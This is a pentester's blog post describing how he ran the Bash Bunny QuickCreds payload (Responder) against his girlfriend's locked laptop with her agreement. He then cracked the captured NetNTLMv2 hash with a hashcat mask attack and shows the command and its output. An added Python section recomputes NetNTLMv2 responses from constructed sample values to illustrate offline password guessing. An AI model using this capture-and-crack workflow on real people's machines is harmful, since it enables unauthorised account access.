I got a Bash Bunny with the Silicon Valley discount code, and was looking forward to playing with it.
I figured that the Bash Bunny QuickCreds module would be a great way to test out my new toy.
First of all, for those unfamiliar with the attack (or title), I highly recommend mubix’s original post.
First, I needed to get the payload loaded onto the device and working properly.
I had a ton of issues sharing internet with my Windows machine, so I decided to try a different one.
Additionally, I was also having trouble sharing internet using my Mac.
In the end, I was able to get it working after following the above instructions on my Kali VM. For more information, see the above thread.
Once I followed the configuration steps, I was able to SSH into my bunny.
Unfortunately, I was unable to properly download anything or update it.
After a few minutes of frustration, I took a look at resolv.conf on the device.
root@bunny:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=43 time=26.7 ms
^C
--- 8.8.8.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 26.766/26.766/26.766/0.000 ms
root@bunny:~# ping google.com
^C
root@bunny:~# cat /etc/resolv.conf
# Dynamic resolv.conf(5) file for glibc resolver(3)
#     generated by resolvconf(8)
#     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
nameserver 8.8.8.8
nameserver 8.8.4.4
While normally this would not be an issue, I have my pfSense configured to block all outgoing DNS requests. In this case, I just disabled the firewall rule for a little since it made life easier.
Before the Bash Bunny QuickCreds payload would work, I would need Responder on the device as well.
First, I added the ToolsInstaller package into the switch1 payload.
Next, I also added the QuickCreds payload into switch2 while I was at it.
Unfortunately, the installation kept failing for ToolsInstaller.
Next, I tried to manually create the pentest folder.
Once I did that, I manually uploaded impacket and responder to the device.
Unfortunately, I was still getting constant failures with the installation.
At this point, I realized that it was probably time to update my firmware.
Going to the download page, I noticed that 1.3 was the newest version.
I followed the instructions, and properly updated the firmware on my device.
Next, I moved Responder to the new proper location, /tools/responder.
At this point, I thought I would be good to go, so I attempted the quickcreds attack.
Unfortunately, the bunny still had an amber light, and I believed that it was Responder’s fault.
Finally, I found the .deb files, and was able to install Responder successfully!
With everything working, I asked Hacker’s Girlfriend if she would be my guinea pig.
First, I verified that she locked and password protected her laptop.
Next, I plugged in the bunny and watched it switch to the amber light.
Finally, after only a few seconds, it switched to a green light indicating success!
After checking the device, there was a file with NetNTLMv2 hashes this time.
Based on a small hint from the girlfriend, it was time to crack the hashes. Unfortunately, I had to quit hashcat in the middle, so I’m not sure exactly how long the process took.
Rays-MacBook-Pro:testing doyler$ hashcat -a 3 -m 5600 -i --increment-min=1 --increment-max=10 hash.txt ?l?l?l?l?l?l?l?l?l?l
hashcat () starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 2 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force

Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: NetNTLMv2
Hash.Target......: GIRLFRIEND::Girlfriend-THINK:dexxxxx...000000
Time.Started.....: Fri Jul 14 19:40:47 2017 (0 secs)
Time.Estimated...: Fri Jul 14 19:40:47 2017 (0 secs)
Guess.Mask.......: ?l [1]
Guess.Queue......: 1/10 (10.00%)
Speed.Dev.#2.....: 0 H/s (0.45ms)
Speed.Dev.#3.....: 0 H/s (0.00ms)
Speed.Dev.#*.....: 0 H/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 26/26 (100.00%)
Rejected.........: 0/26 (0.00%)
Restore.Point....: 0/1 (0.00%)
Candidates.#2....: q -> x
Candidates.#3....: [Generating]

Session..........: hashcat
Status...........: Running
Hash.Type........: NetNTLMv2
Hash.Target......: GIRLFRIEND::Girlfriend-THINK:dexxxxx...000000
Time.Started.....: Wed Jul 19 12:28:22 2017 (1 sec)
Time.Estimated...: Wed Jul 19 12:28:26 2017 (3 secs)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?l?l [10]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 12865.7 kH/s (4.11ms)
Speed.Dev.#3.....: 60526.9 kH/s (7.08ms)
Speed.Dev.#*.....: 73392.6 kH/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: xxxxxxxx/308915776 (xx%)
Rejected.........: 0/88440832 (0.00%)
Restore.Point....: xxxxxxxx/308915776 (xx%)
Candidates.#2....: xxxxxxxxxx -> xxxxxxxxxx
Candidates.#3....: xxxxxxxxxx -> xxxxxxxxxx

GIRLFRIEND::Girlfriend-THINK:dexxxxx:xxxxx:xxxxx:(password here)
After cracking the password, I attempted to use it on her laptop, and it worked!
This was an awesome first payload to use on my bunny, and probably one that I will keep on permanently.
Let me know if you have any ideas or suggestions for other payloads to try or write.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
For clarity you should update your blog. You did not capture NTLM Hashes.
You captured NetNTLMv2 hash(es), part of a challenge request/response, which is entirely different.
Good call! I had the mode right, but mentioned the wrong type. Updated, thanks.
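The comment above and the hashcat run earlier in the post hinge on the same point: what Responder writes out, and what hashcat mode 5600 attacks, is not an NT hash but the NTProofStr of an NTLMv2 challenge/response. As an added example that is neither the post's code nor Responder's or hashcat's, the Python below builds that value the way MS-NLMP defines it (MD4 of the UTF-16LE password, then HMAC-MD5 over the uppercased user plus domain, then HMAC-MD5 over the server challenge plus the client blob), parses a hashcat 5600 line, and shows what a single offline guess amounts to. The user, domain, challenge, timestamp and blob are constructed sample values; the pure-Python MD4 is included because OpenSSL 3 builds often leave `hashlib.new("md4")` unavailable.

```python
"""Constructed example: how a NetNTLMv2 response is derived, and why a capture
can only be attacked by guessing passwords (the NT hash never crosses the wire)."""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4_pure(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (fallback when OpenSSL lacks the legacy provider)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)          # pad to 56 mod 64
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)  # bit length, LE
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                aa = _rotl((aa + fn(bb, cc, dd) + x[idx] + k) & MASK32, shifts[i % 4])
                aa, bb, cc, dd = dd, aa, bb, cc       # rotate registers: a,b,c,d -> d,a,b,c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def md4(data: bytes) -> bytes:
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:                                  # MD4 not built into this OpenSSL
        return md4_pure(data)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. This is the value pass-the-hash needs."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    msg = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), msg, "md5").digest()


def nt_proof_str(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 keyed with NTOWFv2 over server challenge + client blob.
    This 16-byte value is the 'hash' Responder logs; it is bound to one challenge."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, "md5").digest()


def format_hashcat_5600(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_hashcat_5600(line: str) -> dict:
    # USER::DOMAIN:serverchallenge:NTProofStr:blob (the empty field is where LM data would sit)
    user, _lm, domain, chal, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "server_challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def check_password(line: str, candidate: str) -> bool:
    """One guess of an offline attack: recompute NTProofStr from the candidate and compare."""
    h = parse_hashcat_5600(line)
    guess = nt_proof_str(candidate, h["user"], h["domain"], h["server_challenge"], h["blob"])
    return hmac.compare_digest(guess, h["proof"])


# Constructed sample capture (not real data): user, host name, challenge and blob.
SAMPLE_USER, SAMPLE_DOMAIN = "alice", "LAPTOP-EXAMPLE"
SAMPLE_CHALLENGE = bytes.fromhex("0123456789abcdef")            # 8-byte server challenge
SAMPLE_BLOB = (bytes.fromhex("01010000" + "00000000")            # RespType/HiRespType, reserved
               + bytes.fromhex("00f0a6c0d3b3d301")               # constructed FILETIME timestamp
               + bytes.fromhex("aaaaaaaaaaaaaaaa")               # constructed client challenge
               + bytes.fromhex("00000000")                       # reserved
               + bytes.fromhex("00000000"))                      # AV pair list: MsvAvEOL only
SAMPLE_LINE = format_hashcat_5600(
    SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_CHALLENGE,
    nt_proof_str("password", SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_CHALLENGE, SAMPLE_BLOB),
    SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    for guess in ("letmein", "password"):
        print(f"{guess!r}: {check_password(SAMPLE_LINE, guess)}")
```

Two things follow from the construction. First, the logged value is an HMAC bound to one server challenge, so the defender's concern with a capture is offline guessing, not reuse of the value as a credential; the NT hash itself is only recoverable by guessing the password. Second, that guessing is what the mask in the post pays for: the 10-character lowercase mask has 26^10 (about 1.4 x 10^14) candidates, which at the 73 MH/s shown above is roughly three weeks for the last length alone, so password length and character mix are the lever that makes this step impractical.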
Hello doyler. How can I access my bash bunny using WinSCP?
I haven’t actually checked to see if SCP is running by default, but you should be able to access it the same manner as PuTTY.
Hey doyler, I just bought my bash bunny and the password grabber is not working. Can you please help? It will mean a lot, thanks…
Do you mean QuickCreds or something else? What do you mean it is not working, as well?